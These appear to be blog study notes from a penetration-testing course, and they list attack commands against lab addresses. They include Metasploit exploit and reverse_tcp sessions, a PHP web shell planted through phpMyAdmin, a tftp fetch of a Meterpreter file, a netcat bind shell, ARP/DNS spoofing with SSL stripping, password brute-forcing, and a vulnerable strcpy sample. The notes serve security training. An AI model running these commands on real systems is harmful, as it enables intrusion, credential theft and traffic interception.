Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
x86 General Purpose Registers EIP - instruction pointer ESP - stack pointer EBP - base pointer ESI - source index EDI - destination index EAX - accumulator EBX - base ECX - counter EDX - data Sample of Vulnerable Code (C) overflowtest.c: include #include void overflowed() { printf("%s\n", "Execution Hijacked"); } void function1(char *str){ char buffer[5]; strcpy(buffer, str); } void main(int argc, char *argv[]) { function1(argv[1]); printf("%s\n", "Executed normally"); } Vulnerability: (1) Strcpy does not perform bounds checking. (2) Uses Strcpy to copy user input into a fixed sized variable. Therefore, if we give it more data than the variable can hold, the copying will continue into adjacent memory addresses.
0 Comments
Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
(1) Metasploit Scripts: msf > use post/windows/gather/enum_logged_on_users (2) Railgun Extension for Meterpreter that allows access to the Windows API meterpreter > irb >> client.railgun.shell32.IsUserAnAdmin (3) Local Privilege Escalation: GetSystem meterpreter > getsystem (4) Local Privilege Escalation: Local Exploits msf > use exploit/windows/local/ms11_080_afdjoinleaf msf exploit(ms11_080_afdjoinleaf) > set payload windows/meterpreter/reverse_tcp (5) Local Privilege Escalation: Bypassing UAC msf >use exploit/windows/local/bypassuac (6) Local Privilege Escalation: Using a Public Exploit Public exploit in /usr/share/exploitdb Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
Trojans: Bypassing Anti-Virus Signature Detection Techniques: 1- Binary Embedding 2- Metasploit Encoding 3- Multi-Encoding 4- Combining Tecnniques 5- Custom Compiling 6- Creating Shellcode 7- Hyperion 8- Veil Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
(1) Client Side Exploits Browser Attacks msf > use exploit/windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set SRVHOST 192.168.20.9 SRVHOST => 192.168.20.9 msf exploit(ms10_002_aurora) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms10_002_aurora) > set URIPATH aurora URIPATH => aurora msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms10_002_aurora) > set LHOST 192.168.20.9 LHOST => 192.168.20.9 msf exploit(ms10_002_aurora) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.20.9:4444 [*] Using URL: http://192.168.20.9:80/aurora (2) Automatically Migrating msf exploit(ms10_002_aurora) > set PrependMigrate true (3) PDF Exploits msf > use exploit/windows/fileformat/adobe_utilprintf msf exploit(adobe_utilprintf) > show options msf exploit(adobe_utilprintf) > exploit [*] Creating 'msf.pdf' file... [+] msf.pdf stored at /root/.msf4/local/msf.pdf msf exploit(adobe_utilprintf) > cp /root/.msf4/local/msf.pdf /var/www [*] exec: cp /root/.msf4/local/msf.pdf /var/www msf exploit(adobe_utilprintf) > service apache2 start [*] exec service apache2 start Starting web server: apache2. msf exploit(adobe_utilprintf) > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > exploit [*] Started reverse handler on 192.168.20.9:4444 Source: Georgia Weidman on "Advanced Penetration Test"
(1) Crunch Tool to bruteforce keyspace $: crunch 7 7 AB Bruteforces all 7 character passwords composed of only the characters A and B (2) ceWL Tool to map a website and pull potentially interesting words to add to a wordlist $: cewl -w [words].txt -d 1 -m 5 www.[website].com Depth 1 Minimum length of word is 5 characters (3) Hydra Online password cracking tool $: hydra -L userlist.txt -P passwordfile.txt 192.168.20.10 pop3 Offline Password Attacks Source: Georgia Weidman on "Advanced Penetration Test"
(1) Webdav Default Credentials Default -> wampp:xampp a. cadaver http://192.168.0.190/webdav b. Use Msfvenom to create a PHP shell and upload c. Use msfconsole to exploit (2) Open phpMyAdmin a. Create a php shell on the Apache server using a SQL query SELECT "“”<?php system($_GET['cmd']); ?>””" into outfile "C:\\xampp\\htdocs\\shell.php" http://192.168.0.190/shell.php?cmd=ipconfig b. Add a meterpreter PHP file http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php Source: Georgia Weidman on "Advanced Penetration Test"
(1) ARP Spoofing echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t 192.168.20.11 192.168.20.10 arpspoof -i eth0 -t 192.168.20.10 192.168.20.11 (2) Domain Name Service (DNS) DNS Cache Poisoning hosts.txt: 192.168.20.9 www.gmail.com *Restart arpspoofing between gateway and target dnsspoof -i eth0 -f hosts.txt (3) Secure Socket Layer (SSL) Crypto between browser and webserver Can't see credentials in plaintext SSL Man in the Middle SSL Stripping iptables -t nat -A PREROUTING -p tcp -- destination-port 80 -j REDIRECT --to-port 8080 Spoof the default gateway with Arpspoof sslstrip -l 8080 Source: Georgia Weidman, "Advanced Penetration Test" Cybrary
Query systems for potential vulnerabilities (1) Nessus Vulnerability database + scanner (2) Nmap Scripting Engine Vulnerability scripts Listed in /usr/share/nmap/scripts in Kali nmap -sC 172.16.85.135-136 nmap --script-help=smb-check-vulns nmap --script=nfs-ls 172.16.85.136 nmap --script=smb-os-discovery 172.16.85.136 (3) Metasploit Scanners auxiliary/scanner/ftp/anonymous Web Application Scanning (1) Dirbuster Graphical tool that is used for bruteforcing directories and pages. (2) Nikto Vulnerability database of known website issues nikto -host http://172.16.85.136 Manual Analysis *Default passwords - Webdav *Misconfigured pages – open phpMyAdmin *Port 3232 on the Windows system – sensitive webserver with directory traversal # Source: Cybrary "Advanced Penetration Test"
*Find as much information as possible about the target. *What domains do they own? What job ads are they posting? What is their email structure? What technologies are they using on publicly facing systems? (1) Google Dorks Database of helpful Google Dorks: http://www.exploit-db.com/google-dorks/ Example: xamppdirpasswd.txt filetype:txt finds xampp passwords (2) Shodan (Python API) Search engine that uses banner grabbing (3) Whois Domain registration records root@kali:~# whois ________.com (4) DNS Recon root@kali:~# host www.________.com root@kali:~# host -t ns ________.com root@kali:~# host -t mx ________.com *DNS Zone Transfer root@kali:~# host -t ns zoneedit.com root@kali:~# host -l zoneedit.com ns2.zoneedit.com DNS Bruteforce root@kali:~# fierce -dns ________.com (5) Netcraft http://searchdns.netcraft.com/ (6) The Harvester The Harvester automatically searches for emails etc. online root@kali:~# theharvester -d ________.com -l 500 -b all # Notes on Cybrary "Advanced Penetration Test"
Opening a command shell listener: root@kali:~# nc -lvp 1234 -e /bin/bash Transferring files: Redirect output to a file: root@kali:~# nc -lvp 1234 > netcatfile Send a file from another terminal: root@kali:~# nc 10.0.0.100 1234 < mydirectory/myfile Automating Tasks with cron jobs Add your task to one of the scheduled directories *For more flexibility add a line to /etc/crontab |
AuthorVitali Kremez Archives
July 2016
Categories |